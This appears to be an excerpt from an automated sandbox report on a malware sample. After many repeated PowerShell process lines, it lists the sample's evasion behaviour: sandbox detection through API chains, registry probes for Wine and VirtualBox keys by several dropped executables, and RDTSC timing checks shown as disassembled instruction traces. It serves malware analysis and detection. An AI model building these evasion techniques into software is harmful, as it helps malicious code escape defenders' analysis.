                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                                                Malware Analysis System Evasion

                                                barindex
                                                Found API chain indicative of sandbox detection
                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_0-96632
                                                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXEFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXEFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXEFile opened: HKEY_CURRENT_USER\Software\Wine
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXEFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                                                Source: C:\Users\user\AppData\Roaming\10000770100\vertualiziren.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                                                Source: C:\Users\user\AppData\Roaming\10000770100\vertualiziren.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                                                Source: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                                                Source: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                                                Source: C:\ProgramData\jnxnee\benskvi.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                                                Source: C:\ProgramData\jnxnee\benskvi.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                                                Source: C:\Users\user\AppData\Local\TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXEFile opened: HKEY_CURRENT_USER\Software\Wine
                                                Source: C:\Users\user\AppData\Local\TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXEFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                                                Source: C:\Users\user\AppData\Local\TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXEFile opened: HKEY_CURRENT_USER\Software\Wine
                                                Source: C:\Users\user\AppData\Local\TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXEFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                                                Source: C:\Users\user\AppData\Local\Temp\10111180101\7dbaa342f5.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                                                Source: C:\Users\user\AppData\Local\Temp\10111180101\7dbaa342f5.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                                                Tries to detect virtualization through RDTSC time measurements
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 693296 second address: 692B2E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD81C888268h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c xor dword ptr [ebp+122D229Fh], eax 0x00000012 push dword ptr [ebp+122D140Dh] 0x00000018 jl 00007FD81C888270h 0x0000001e call dword ptr [ebp+122D188Eh] 0x00000024 pushad 0x00000025 cld 0x00000026 xor eax, eax 0x00000028 pushad 0x00000029 jne 00007FD81C88825Ch 0x0000002f xor dword ptr [ebp+122D232Bh], ebx 0x00000035 mov ebx, dword ptr [ebp+122D28D3h] 0x0000003b popad 0x0000003c mov edx, dword ptr [esp+28h] 0x00000040 jl 00007FD81C88825Ch 0x00000046 mov dword ptr [ebp+122D2973h], eax 0x0000004c sub dword ptr [ebp+122D26DCh], esi 0x00000052 mov esi, 0000003Ch 0x00000057 mov dword ptr [ebp+122D26DCh], ebx 0x0000005d add esi, dword ptr [esp+24h] 0x00000061 add dword ptr [ebp+122D270Bh], edx 0x00000067 lodsw 0x00000069 stc 0x0000006a add eax, dword ptr [esp+24h] 0x0000006e jmp 00007FD81C88825Eh 0x00000073 mov ebx, dword ptr [esp+24h] 0x00000077 stc 0x00000078 jng 00007FD81C888257h 0x0000007e stc 0x0000007f nop 0x00000080 push eax 0x00000081 push edx 0x00000082 push eax 0x00000083 push edx 0x00000084 push esi 0x00000085 pop esi 0x00000086 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 692B2E second address: 692B32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 692B32 second address: 692B38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 692B38 second address: 692B3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 811FC3 second address: 811FE1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD81C88825Eh 0x00000008 jmp 00007FD81C88825Bh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8002E1 second address: 8002F0 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FD81D0C8426h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8002F0 second address: 8002F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8002F7 second address: 8002FC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 81122A second address: 811234 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 81165A second address: 811669 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD81D0C842Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8117AD second address: 8117C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop esi 0x00000007 pushad 0x00000008 jmp 00007FD81C88825Dh 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8117C6 second address: 8117CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8117CB second address: 8117EB instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD81C888258h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007FD81C88825Fh 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 pop eax 0x00000014 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8117EB second address: 8117FD instructions: 0x00000000 rdtsc 0x00000002 jno 00007FD81D0C8426h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jp 00007FD81D0C8426h 0x00000012 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8131F6 second address: 692B2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 xor dword ptr [esp], 57962148h 0x0000000d sub dword ptr [ebp+122D17BEh], edi 0x00000013 push dword ptr [ebp+122D140Dh] 0x00000019 mov dword ptr [ebp+122D179Ch], ebx 0x0000001f call dword ptr [ebp+122D188Eh] 0x00000025 pushad 0x00000026 cld 0x00000027 xor eax, eax 0x00000029 pushad 0x0000002a jne 00007FD81C88825Ch 0x00000030 xor dword ptr [ebp+122D232Bh], ebx 0x00000036 mov ebx, dword ptr [ebp+122D28D3h] 0x0000003c popad 0x0000003d mov edx, dword ptr [esp+28h] 0x00000041 jl 00007FD81C88825Ch 0x00000047 mov dword ptr [ebp+122D2973h], eax 0x0000004d sub dword ptr [ebp+122D26DCh], esi 0x00000053 mov esi, 0000003Ch 0x00000058 mov dword ptr [ebp+122D26DCh], ebx 0x0000005e add esi, dword ptr [esp+24h] 0x00000062 add dword ptr [ebp+122D270Bh], edx 0x00000068 lodsw 0x0000006a stc 0x0000006b add eax, dword ptr [esp+24h] 0x0000006f jmp 00007FD81C88825Eh 0x00000074 mov ebx, dword ptr [esp+24h] 0x00000078 stc 0x00000079 jng 00007FD81C888257h 0x0000007f stc 0x00000080 nop 0x00000081 push eax 0x00000082 push edx 0x00000083 push eax 0x00000084 push edx 0x00000085 push esi 0x00000086 pop esi 0x00000087 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 813293 second address: 8132FB instructions: 0x00000000 rdtsc 0x00000002 jp 00007FD81D0C8426h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b add dword ptr [esp], 78746957h 0x00000012 jns 00007FD81D0C8430h 0x00000018 push 00000003h 0x0000001a jmp 00007FD81D0C8437h 0x0000001f jmp 00007FD81D0C8432h 0x00000024 push 00000000h 0x00000026 push 00000003h 0x00000028 jmp 00007FD81D0C842Dh 0x0000002d push A809F895h 0x00000032 push ecx 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 popad 0x00000037 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8132FB second address: 813346 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 xor dword ptr [esp], 6809F895h 0x0000000e sub dword ptr [ebp+122D1864h], ecx 0x00000014 lea ebx, dword ptr [ebp+12454146h] 0x0000001a jns 00007FD81C88825Eh 0x00000020 xchg eax, ebx 0x00000021 push ecx 0x00000022 jnc 00007FD81C88825Ch 0x00000028 pop ecx 0x00000029 push eax 0x0000002a pushad 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007FD81C888260h 0x00000032 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 81360B second address: 813648 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD81D0C8432h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b jmp 00007FD81D0C842Ah 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 push ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FD81D0C8434h 0x0000001c rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 813648 second address: 8136D3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a jl 00007FD81C888258h 0x00000010 push eax 0x00000011 pop eax 0x00000012 ja 00007FD81C88825Ch 0x00000018 popad 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d jmp 00007FD81C888266h 0x00000022 pop eax 0x00000023 push 00000000h 0x00000025 push ebx 0x00000026 call 00007FD81C888258h 0x0000002b pop ebx 0x0000002c mov dword ptr [esp+04h], ebx 0x00000030 add dword ptr [esp+04h], 0000001Ch 0x00000038 inc ebx 0x00000039 push ebx 0x0000003a ret 0x0000003b pop ebx 0x0000003c ret 0x0000003d pushad 0x0000003e mov cl, bh 0x00000040 or dword ptr [ebp+122D184Eh], edi 0x00000046 popad 0x00000047 clc 0x00000048 lea ebx, dword ptr [ebp+1245415Ah] 0x0000004e push edi 0x0000004f jmp 00007FD81C888260h 0x00000054 pop edx 0x00000055 push eax 0x00000056 pushad 0x00000057 push eax 0x00000058 push edx 0x00000059 jnp 00007FD81C888256h 0x0000005f rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 834650 second address: 834654 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
